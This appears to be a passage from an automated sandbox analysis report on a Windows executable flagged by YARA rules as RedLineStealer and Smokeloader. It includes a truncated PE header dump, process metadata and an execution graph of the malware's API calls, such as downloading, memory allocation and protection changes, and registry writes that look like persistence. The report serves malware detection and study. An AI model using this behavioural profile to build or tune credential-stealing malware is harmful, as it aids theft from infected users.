                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Dec 13, 2024 10:49:15.790117025 CET1236INHTTP/1.1 200 OK
                                              Date: Fri, 13 Dec 2024 09:49:15 GMT
                                              Server: Apache/2.4.58 (Ubuntu)
                                              Content-Disposition: attachment; filename="soft";
                                              Content-Length: 1502720
                                              Keep-Alive: timeout=5, max=99
                                              Connection: Keep-Alive
                                              Content-Type: application/octet-stream
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-a


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:04:48:14
                                              Start date:13/12/2024
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                              Imagebase:0x400000
                                              File size:1'966'080 bytes
                                              MD5 hash:2E164F8EB316718AE1C48ED84E05DC9F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2878196099.0000000000F6C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:04:49:17
                                              Start date:13/12/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 584
                                              Imagebase:0xac0000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:4.2%
                                                Dynamic/Decrypted Code Coverage:11.3%
                                                Signature Coverage:56.5%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:23
                                                execution_graph 38032 401940 38033 4019af InternetSetFilePointer InternetReadFile 38032->38033 38034 401a50 __CreateFrameInfo 38033->38034 38035 401a7a HttpQueryInfoA 38034->38035 38036 401aa3 CoCreateInstance 38035->38036 38037 401dea 38035->38037 38036->38037 38040 401adc 38036->38040 38101 4099d7 38037->38101 38039 401e13 38040->38037 38065 402730 38040->38065 38042 401b2c 38043 401c05 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38042->38043 38044 401e19 38042->38044 38052 401d8c __InternalCxxFrameHandler 38043->38052 38081 409b4a 38043->38081 38108 40cfaf 38044->38108 38048 401c3b 38049 409b4a 41 API calls 38048->38049 38048->38052 38053 401cf3 __InternalCxxFrameHandler 38048->38053 38055 401cc7 __CreateFrameInfo 38049->38055 38050 401d7b 38098 40d09d 14 API calls __dosmaperr 38050->38098 38052->38037 38053->38050 38053->38052 38056 401d88 __CreateFrameInfo 38053->38056 38054 401d80 38100 40cf9f 39 API calls ___std_exception_copy 38054->38100 38055->38053 38059 401d1f 38055->38059 38061 401d2c 38055->38061 38056->38052 38099 40d09d 14 API calls __dosmaperr 38056->38099 38095 40d09d 14 API calls __dosmaperr 38059->38095 38061->38053 38096 40d09d 14 API calls __dosmaperr 38061->38096 38062 401d24 38097 40cf9f 39 API calls ___std_exception_copy 38062->38097 38066 402800 38065->38066 38067 40274f 38065->38067 38115 4015d0 43 API calls 3 library calls 38066->38115 38069 40275b __InternalCxxFrameHandler 38067->38069 38072 4027be 38067->38072 38075 402783 38067->38075 38076 4027c7 38067->38076 38069->38042 38070 402805 38116 401530 41 API calls 3 library calls 38070->38116 38072->38070 38072->38075 38074 402796 38077 40cfaf 39 API calls 38074->38077 38080 40279f __InternalCxxFrameHandler 38074->38080 38113 401530 41 API calls 4 library calls 38075->38113 38076->38080 38114 401530 41 API calls 4 library calls 38076->38114 38079 40280f 38077->38079 38080->38042 38083 409b0c 38081->38083 38084 409b2b 38083->38084 38086 409b2d 38083->38086 38119 411672 EnterCriticalSection LeaveCriticalSection _unexpected 38083->38119 38120 40fb0d 38083->38120 38084->38048 38087 401530 Concurrency::cancel_current_task 38086->38087 38088 409b37 38086->38088 38117 40af40 RaiseException 38087->38117 38127 40af40 RaiseException 38088->38127 38090 40154c 38118 40acf1 40 API calls 2 library calls 38090->38118 38092 40a549 38094 401573 38094->38048 38095->38062 38096->38062 38097->38053 38098->38054 38099->38054 38100->38052 38102 4099e0 IsProcessorFeaturePresent 38101->38102 38103 4099df 38101->38103 38105 409a27 38102->38105 38103->38039 38130 4099ea SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38105->38130 38107 409b0a 38107->38039 38131 40ceeb 39 API calls ___std_exception_copy 38108->38131 38110 40cfbe 38132 40cfcc 11 API calls __CreateFrameInfo 38110->38132 38112 40cfcb 38113->38074 38114->38080 38115->38070 38116->38074 38117->38090 38118->38094 38119->38083 38125 413c79 _unexpected 38120->38125 38121 413cb7 38129 40d09d 14 API calls __dosmaperr 38121->38129 38122 413ca2 RtlAllocateHeap 38124 413cb5 38122->38124 38122->38125 38124->38083 38125->38121 38125->38122 38128 411672 EnterCriticalSection LeaveCriticalSection _unexpected 38125->38128 38127->38092 38128->38125 38129->38124 38130->38107 38131->38110 38132->38112 38133 f6c966 38134 f6c975 38133->38134 38137 f6d106 38134->38137 38140 f6d121 38137->38140 38138 f6d12a CreateToolhelp32Snapshot 38139 f6d146 Module32First 38138->38139 38138->38140 38141 f6d155 38139->38141 38142 f6c97e 38139->38142 38140->38138 38140->38139 38144 f6cdc5 38141->38144 38145 f6cdf0 38144->38145 38146 f6ce01 VirtualAlloc 38145->38146 38147 f6ce39 38145->38147 38146->38147 38148 aad4ab VirtualProtect 38149 aad4bf 38148->38149 38150 40a071 38151 40a07d ___scrt_is_nonwritable_in_current_image 38150->38151 38178 409dd1 38151->38178 38153 40a084 38154 40a1d7 38153->38154 38166 40a0ae ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 38153->38166 38206 40a54a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 38154->38206 38156 40a1de 38207 41066b 38156->38207 38160 40a1ec 38161 40a0cd 38162 40a14e 38186 40a665 38162->38186 38166->38161 38166->38162 38202 410645 39 API calls 3 library calls 38166->38202 38179 409dda 38178->38179 38211 40a2ac IsProcessorFeaturePresent 38179->38211 38181 409de6 38212 40b73d 10 API calls 2 library calls 38181->38212 38183 409deb 38185 409def 38183->38185 38213 40b75c 7 API calls 2 library calls 38183->38213 38185->38153 38214 40b530 38186->38214 38188 40a678 GetStartupInfoW 38189 40a154 38188->38189 38190 412248 38189->38190 38216 41812d 38190->38216 38192 40a15c 38195 408770 38192->38195 38194 412251 38194->38192 38222 4183dd 39 API calls 38194->38222 38196 402730 43 API calls 38195->38196 38197 4087a5 38196->38197 38198 402730 43 API calls 38197->38198 38199 4087ca 38198->38199 38225 405a30 38199->38225 38202->38162 38206->38156 40705 41049f 38207->40705 38210 41062f 21 API calls __CreateFrameInfo 38210->38160 38211->38181 38212->38183 38213->38185 38215 40b547 38214->38215 38215->38188 38215->38215 38217 418136 38216->38217 38221 418168 38216->38221 38223 41295d 39 API calls 3 library calls 38217->38223 38219 418159 38224 417f38 49 API calls 3 library calls 38219->38224 38221->38194 38222->38194 38223->38219 38224->38221 38656 4107e2 GetSystemTimeAsFileTime 38225->38656 38227 405a7f 38658 4106a2 38227->38658 38230 402730 43 API calls 38235 405aba 38230->38235 38231 402730 43 API calls 38264 405c80 __InternalCxxFrameHandler __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38231->38264 38232 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38232->38231 38232->38264 38233 40cfaf 39 API calls 38233->38264 38235->38232 39822 4025a0 41 API calls 38235->39822 38239 409b4a 41 API calls 38239->38264 38240 4061c5 38677 406c20 38240->38677 38242 4061ec 38687 402430 38242->38687 38244 402730 43 API calls 38244->38264 38247 4061fc 38691 402360 38247->38691 38251 406210 38252 4062e5 38251->38252 38253 406218 38251->38253 39860 406ec0 53 API calls 2 library calls 38252->39860 38257 406288 38253->38257 38258 40622b 38253->38258 38256 4062ea 38262 402430 43 API calls 38256->38262 39855 406db0 53 API calls 2 library calls 38257->39855 39850 406ca0 53 API calls 2 library calls 38258->39850 38259 406192 Sleep 38259->38264 38266 4062fa 38262->38266 38263 406230 38267 402430 43 API calls 38263->38267 38264->38233 38264->38239 38264->38240 38264->38244 38264->38259 38271 40619e 38264->38271 38282 406c0b 38264->38282 38283 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38264->38283 38661 4107b2 38264->38661 38665 403a90 38264->38665 39823 4025a0 41 API calls 38264->39823 39824 409c85 6 API calls 38264->39824 39825 409f97 42 API calls 38264->39825 39826 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38264->39826 39827 4092d0 38264->39827 39832 401e20 38264->39832 38265 40628d 38268 402430 43 API calls 38265->38268 38269 402360 39 API calls 38266->38269 38270 406240 38267->38270 38272 40629d 38268->38272 38274 40630e 38269->38274 39851 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38270->39851 39848 408c10 43 API calls 38271->39848 39856 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38272->39856 38279 4063e4 38274->38279 38280 406316 38274->38280 38277 4062a6 38284 402360 39 API calls 38277->38284 38278 4061aa 38285 402360 39 API calls 38278->38285 39869 407260 53 API calls 2 library calls 38279->39869 39861 406f40 53 API calls 2 library calls 38280->39861 38281 406249 38287 402360 39 API calls 38281->38287 39925 403c20 38282->39925 38283->38259 38290 4062ae 38284->38290 38291 4061b2 38285->38291 38293 406251 38287->38293 39857 406e40 53 API calls 2 library calls 38290->39857 38297 402360 39 API calls 38291->38297 38292 40631b 38304 402430 43 API calls 38292->38304 39852 406d30 53 API calls 2 library calls 38293->39852 38295 4063e9 38302 402430 43 API calls 38295->38302 38300 4061ba 38297->38300 38299 4062b3 38308 402430 43 API calls 38299->38308 39849 4017d0 CoUninitialize 38300->39849 38301 406256 38307 402430 43 API calls 38301->38307 38305 4063f9 38302->38305 38306 40632b 38304->38306 38315 402360 39 API calls 38305->38315 39862 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38306->39862 38310 406266 38307->38310 38311 4062c3 38308->38311 39853 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38310->39853 39858 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38311->39858 38312 406334 38313 402360 39 API calls 38312->38313 38317 40633c 38313->38317 38319 40640d 38315->38319 39863 406fc0 53 API calls 2 library calls 38317->39863 38318 40626f 38322 402360 39 API calls 38318->38322 38502 4064ce 38319->38502 39870 4072e0 53 API calls 2 library calls 38319->39870 38320 4062cc 38323 402360 39 API calls 38320->38323 38325 406277 38322->38325 38328 4062d4 38323->38328 38324 406341 38333 402430 43 API calls 38324->38333 39854 408c10 43 API calls 38325->39854 39859 408c10 43 API calls 38328->39859 38330 40641a 38336 402430 43 API calls 38330->38336 38331 4064d8 38337 402430 43 API calls 38331->38337 38335 406351 38333->38335 38334 40686e 38699 401770 38334->38699 39864 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38335->39864 38341 40642a 38336->38341 38342 4064e8 38337->38342 39871 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38341->39871 38349 402360 39 API calls 38342->38349 38343 406881 38703 408380 38343->38703 38344 40635a 38347 402360 39 API calls 38344->38347 38351 406362 38347->38351 38348 406433 38352 402360 39 API calls 38348->38352 38354 4064fc 38349->38354 38350 40688a 38360 402430 43 API calls 38350->38360 39865 407040 53 API calls 2 library calls 38351->39865 38353 40643b 38352->38353 39872 407360 53 API calls 2 library calls 38353->39872 38582 4065e3 38354->38582 39879 407680 53 API calls 2 library calls 38354->39879 38357 406367 38365 402430 43 API calls 38357->38365 38358 406440 38368 402430 43 API calls 38358->38368 38364 40689d 38360->38364 38362 4065ed 38370 402430 43 API calls 38362->38370 38363 406509 38372 402430 43 API calls 38363->38372 38713 408300 38364->38713 38367 406377 38365->38367 38376 402360 39 API calls 38367->38376 38371 406450 38368->38371 38369 4068a8 38379 402430 43 API calls 38369->38379 38373 4065fd 38370->38373 39873 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38371->39873 38375 406519 38372->38375 38387 402360 39 API calls 38373->38387 39880 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38375->39880 38381 40638b 38376->38381 38377 406459 38382 402360 39 API calls 38377->38382 38380 4068bb 38379->38380 38723 408260 38380->38723 38385 4063ac 38381->38385 38386 40638f 38381->38386 38388 406461 38382->38388 38383 406522 38389 402360 39 API calls 38383->38389 39867 407150 53 API calls 2 library calls 38385->39867 39866 4070d0 53 API calls 2 library calls 38386->39866 38392 406611 38387->38392 39874 4073e0 53 API calls 2 library calls 38388->39874 38394 40652a 38389->38394 38390 4068c6 38404 402430 43 API calls 38390->38404 38396 406693 38392->38396 38397 406615 38392->38397 39881 407700 53 API calls 2 library calls 38394->39881 39896 407c40 53 API calls 2 library calls 38396->39896 39890 407ab0 53 API calls 2 library calls 38397->39890 38401 406466 38410 402430 43 API calls 38401->38410 38402 40652f 38412 402430 43 API calls 38402->38412 38403 4063b1 38407 402430 43 API calls 38403->38407 38408 4068d9 38404->38408 38405 406698 38418 402430 43 API calls 38405->38418 38406 40661a 38419 402430 43 API calls 38406->38419 38413 4063c1 38407->38413 38733 408d60 38408->38733 38409 402430 43 API calls 38415 4063a4 38409->38415 38411 406476 38410->38411 38426 402360 39 API calls 38411->38426 38416 40653f 38412->38416 38428 402360 39 API calls 38413->38428 39915 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38415->39915 39882 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38416->39882 38423 4066a8 38418->38423 38424 40662a 38419->38424 38437 402360 39 API calls 38423->38437 39891 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38424->39891 38432 40648a 38426->38432 38427 406548 38433 402360 39 API calls 38427->38433 38434 4063d5 38428->38434 38429 406906 38741 408e70 38429->38741 38430 406855 38436 402360 39 API calls 38430->38436 38541 406283 38430->38541 38431 406633 38438 402360 39 API calls 38431->38438 38439 406498 38432->38439 38440 40648e 38432->38440 38441 406550 38433->38441 38434->38541 39868 4071e0 53 API calls 2 library calls 38434->39868 38436->38541 38443 4066bc 38437->38443 38444 40663b 38438->38444 39876 4074f0 53 API calls 2 library calls 38439->39876 39875 407470 53 API calls 2 library calls 38440->39875 39883 407780 53 API calls 2 library calls 38441->39883 38450 4066c0 38443->38450 38451 40673e 38443->38451 39892 407b30 53 API calls 2 library calls 38444->39892 38449 408dc0 43 API calls 38456 406933 38449->38456 39897 407cd0 53 API calls 2 library calls 38450->39897 39903 407e50 53 API calls 2 library calls 38451->39903 38453 406394 38453->38409 38454 406555 38465 402430 43 API calls 38454->38465 38455 40649d 38466 402430 43 API calls 38455->38466 38460 408e70 43 API calls 38456->38460 38459 406640 38468 402430 43 API calls 38459->38468 38461 406948 38460->38461 38464 408dc0 43 API calls 38461->38464 38462 406743 38472 402430 43 API calls 38462->38472 38463 4066c5 38473 402430 43 API calls 38463->38473 38467 406960 38464->38467 38469 406565 38465->38469 38470 4064ad 38466->38470 38471 402360 39 API calls 38467->38471 38474 406650 38468->38474 39884 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38469->39884 38481 402360 39 API calls 38470->38481 38476 40696e 38471->38476 38477 406753 38472->38477 38478 4066d5 38473->38478 39893 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38474->39893 38482 402360 39 API calls 38476->38482 38493 402360 39 API calls 38477->38493 39898 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38478->39898 38480 40656e 38485 402360 39 API calls 38480->38485 38487 4064c1 38481->38487 38488 406979 38482->38488 38484 406659 38490 402360 39 API calls 38484->38490 38486 406576 38485->38486 39885 407800 53 API calls 2 library calls 38486->39885 38487->38541 39877 407580 53 API calls 2 library calls 38487->39877 38492 402360 39 API calls 38488->38492 38489 4066de 38494 402360 39 API calls 38489->38494 38495 406661 38490->38495 38498 406984 38492->38498 38499 406767 38493->38499 38500 4066e6 38494->38500 39894 407bc0 53 API calls 2 library calls 38495->39894 38496 40657b 38512 402430 43 API calls 38496->38512 38503 402360 39 API calls 38498->38503 38504 40676b 38499->38504 38505 4067be 38499->38505 39899 407d50 53 API calls 2 library calls 38500->39899 39878 407600 53 API calls 2 library calls 38502->39878 38509 40698f 38503->38509 39904 407ee0 53 API calls 2 library calls 38504->39904 39909 408060 53 API calls 2 library calls 38505->39909 38507 406666 38516 402430 43 API calls 38507->38516 38514 402360 39 API calls 38509->38514 38511 4066eb 38519 402430 43 API calls 38511->38519 38517 40658b 38512->38517 38513 4067c3 38525 402430 43 API calls 38513->38525 38518 40699a 38514->38518 38515 406770 38522 402430 43 API calls 38515->38522 38520 406676 38516->38520 38530 402360 39 API calls 38517->38530 38521 402360 39 API calls 38518->38521 38523 4066fb 38519->38523 39895 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38520->39895 38526 4069a5 38521->38526 38527 406780 38522->38527 39900 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38523->39900 38531 4067d3 38525->38531 38532 402360 39 API calls 38526->38532 39905 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38527->39905 38529 40667f 38536 402360 39 API calls 38529->38536 38537 40659f 38530->38537 38547 402360 39 API calls 38531->38547 38533 4069b0 38532->38533 38538 402360 39 API calls 38533->38538 38535 406704 38540 402360 39 API calls 38535->38540 38536->38541 38542 4065a8 38537->38542 39886 407890 53 API calls 2 library calls 38537->39886 38584 4069bf 38538->38584 38539 406789 38544 402360 39 API calls 38539->38544 38545 40670c 38540->38545 38541->38334 39916 402330 43 API calls 38541->39916 39887 407910 53 API calls 2 library calls 38542->39887 38549 406791 38544->38549 39901 407dd0 53 API calls 2 library calls 38545->39901 38551 4067e7 38547->38551 38548 4065b2 38557 402430 43 API calls 38548->38557 39906 407f60 53 API calls 2 library calls 38549->39906 38551->38541 39910 4080e0 53 API calls 2 library calls 38551->39910 38553 406711 38559 402430 43 API calls 38553->38559 38555 406796 38561 402430 43 API calls 38555->38561 38556 4067f0 38563 402430 43 API calls 38556->38563 38558 4065c2 38557->38558 38567 402360 39 API calls 38558->38567 38562 406721 38559->38562 38560 406a1e Sleep 38560->38584 38564 4067a6 38561->38564 39902 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38562->39902 38566 406800 38563->38566 39907 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38564->39907 39911 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38566->39911 38572 4065d6 38567->38572 38569 40672a 38570 402360 39 API calls 38569->38570 38570->38541 38572->38541 39888 4079a0 53 API calls 2 library calls 38572->39888 38573 402430 43 API calls 38573->38584 38574 4067af 38575 402360 39 API calls 38574->38575 38577 4067b7 38575->38577 38576 406809 38578 402360 39 API calls 38576->38578 39908 407fe0 53 API calls 2 library calls 38577->39908 38581 406811 38578->38581 39912 408160 53 API calls 2 library calls 38581->39912 39889 407a20 53 API calls 2 library calls 38582->39889 38584->38560 38584->38573 38585 406a27 38584->38585 38589 406a16 38584->38589 38586 402360 39 API calls 38585->38586 38588 406a2f 38586->38588 38587 406816 38595 402430 43 API calls 38587->38595 38744 408c40 38588->38744 38592 402360 39 API calls 38589->38592 38590 4067bc 38593 402430 43 API calls 38590->38593 38592->38560 38593->38415 38594 406a40 38596 408c40 43 API calls 38594->38596 38597 406826 38595->38597 38599 406a59 38596->38599 39913 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38597->39913 38601 408c40 43 API calls 38599->38601 38600 40682f 38602 402360 39 API calls 38600->38602 38603 406a6c 38601->38603 38604 406837 38602->38604 38761 404f50 38603->38761 39914 4081e0 53 API calls 2 library calls 38604->39914 38607 406a81 38608 406aa1 38607->38608 38609 408c40 43 API calls 38607->38609 39917 408410 53 API calls 2 library calls 38608->39917 38611 406a9c 38609->38611 39244 403d20 38611->39244 38612 406aa9 38614 402430 43 API calls 38612->38614 38615 406ab9 38614->38615 38616 402360 39 API calls 38615->38616 38617 406acd 38616->38617 38618 406b70 38617->38618 38619 401770 41 API calls 38617->38619 39920 408580 53 API calls 2 library calls 38618->39920 38621 406ae8 38619->38621 39918 4084a0 53 API calls 2 library calls 38621->39918 38622 406b75 38625 402430 43 API calls 38622->38625 38624 406af1 38627 402430 43 API calls 38624->38627 38626 406b88 38625->38626 38628 402360 39 API calls 38626->38628 38631 406b01 38627->38631 38629 406b9f 38628->38629 38629->38282 38630 406ba3 38629->38630 39921 4086f0 53 API calls 2 library calls 38630->39921 38634 406b37 38631->38634 38635 406b28 Sleep 38631->38635 38633 406bb0 38638 402430 43 API calls 38633->38638 38639 402430 43 API calls 38634->38639 38635->38631 38636 406b35 38635->38636 38637 406b59 38636->38637 38640 402360 39 API calls 38637->38640 38641 406bbf 38638->38641 38642 406b4e 38639->38642 38643 406b61 38640->38643 39922 408670 53 API calls 2 library calls 38641->39922 38645 402360 39 API calls 38642->38645 39919 4017d0 CoUninitialize 38643->39919 38645->38637 38647 406bd3 38648 402430 43 API calls 38647->38648 38649 406be2 38648->38649 39923 408610 53 API calls __Init_thread_footer 38649->39923 38651 406bf0 38652 402430 43 API calls 38651->38652 38653 406bff 38652->38653 39924 4058d0 247 API calls 5 library calls 38653->39924 38655 406c08 38655->38282 38657 41081b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38656->38657 38657->38227 39928 4128a2 GetLastError 38658->39928 38662 4107ca 38661->38662 38663 4107c0 38661->38663 38662->38264 39972 4106b4 43 API calls 2 library calls 38663->39972 38676 403ad1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38665->38676 38666 408c40 43 API calls 38666->38676 38667 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 38669 403c13 38667->38669 38669->38264 38670 403b6d 38671 403bb1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38670->38671 38672 403c17 38670->38672 38671->38667 38674 40cfaf 39 API calls 38672->38674 38673 403b55 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38673->38671 38673->38672 39973 408f40 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38673->39973 38675 403c1c 38674->38675 38676->38666 38676->38672 38676->38673 38678 406c4c 38677->38678 38686 406c7e 38677->38686 39974 409c85 6 API calls 38678->39974 38679 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 38681 406c90 38679->38681 38681->38242 38682 406c56 38682->38686 39975 409f97 42 API calls 38682->39975 38684 406c74 39976 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38684->39976 38686->38679 38688 402453 38687->38688 38688->38688 38689 402730 43 API calls 38688->38689 38690 402465 38689->38690 38690->38247 38692 40236b 38691->38692 38693 402386 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38691->38693 38692->38693 38694 40cfaf 39 API calls 38692->38694 38693->38251 38695 4023aa 38694->38695 38696 4023e1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38695->38696 38697 40cfaf 39 API calls 38695->38697 38696->38251 38698 40242c 38697->38698 38700 401783 __CreateFrameInfo 38699->38700 38701 409b4a 41 API calls 38700->38701 38702 40179a __CreateFrameInfo 38701->38702 38702->38343 38704 4083ee 38703->38704 38705 4083b2 38703->38705 38707 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 38704->38707 39977 409c85 6 API calls 38705->39977 38709 408400 38707->38709 38708 4083bc 38708->38704 39978 409f97 42 API calls 38708->39978 38709->38350 38711 4083e4 39979 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38711->39979 38714 40832c 38713->38714 38722 40835e 38713->38722 39980 409c85 6 API calls 38714->39980 38715 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 38717 408370 38715->38717 38717->38369 38718 408336 38718->38722 39981 409f97 42 API calls 38718->39981 38720 408354 39982 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38720->39982 38722->38715 38724 4082e2 38723->38724 38725 40829d 38723->38725 38727 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 38724->38727 39983 409c85 6 API calls 38725->39983 38729 4082f5 38727->38729 38728 4082a7 38728->38724 39984 409f97 42 API calls 38728->39984 38729->38390 38731 4082d8 39985 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38731->39985 38734 408d74 38733->38734 38735 4092d0 43 API calls 38734->38735 38736 4068ee 38735->38736 38737 408dc0 38736->38737 38738 408ddb 38737->38738 38739 408def __InternalCxxFrameHandler 38738->38739 39986 402810 43 API calls 3 library calls 38738->39986 38739->38429 39987 4090f0 38741->39987 38743 40691b 38743->38449 38745 408c6a 38744->38745 38746 408d2d 38745->38746 38750 408c7e 38745->38750 40010 4015d0 43 API calls 3 library calls 38746->40010 38748 408c8a __InternalCxxFrameHandler 38748->38594 38749 408d32 40011 401530 41 API calls 3 library calls 38749->40011 38750->38748 38752 408cd8 38750->38752 38753 408cf9 38750->38753 38752->38749 38755 408cdf 38752->38755 38760 408cee __InternalCxxFrameHandler 38753->38760 40009 401530 41 API calls 4 library calls 38753->40009 38754 408ce5 38756 40cfaf 39 API calls 38754->38756 38754->38760 40008 401530 41 API calls 4 library calls 38755->40008 38758 408d3c 38756->38758 38760->38594 38762 4107e2 GetSystemTimeAsFileTime 38761->38762 38763 404f9f 38762->38763 38764 4106a2 39 API calls 38763->38764 38765 404fa8 __CreateFrameInfo 38764->38765 38766 409b4a 41 API calls 38765->38766 38773 404ffc __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38766->38773 38769 402730 43 API calls 38769->38773 38771 4092d0 43 API calls 38771->38773 38772 401e20 44 API calls 38772->38773 38773->38769 38773->38771 38773->38772 38774 4052d0 Sleep 38773->38774 38775 4058bd 38773->38775 38782 4052e0 __CreateFrameInfo 38773->38782 40012 402470 38773->40012 40153 409c85 6 API calls 38773->40153 40154 409f97 42 API calls 38773->40154 40155 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38773->40155 38774->38773 38776 40cfaf 39 API calls 38775->38776 38777 4058c2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 38776->38777 38780 405964 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38777->38780 38781 405a22 38780->38781 38783 405a0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38780->38783 38785 40cfaf 39 API calls 38781->38785 38788 409b4a 41 API calls 38782->38788 38784 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 38783->38784 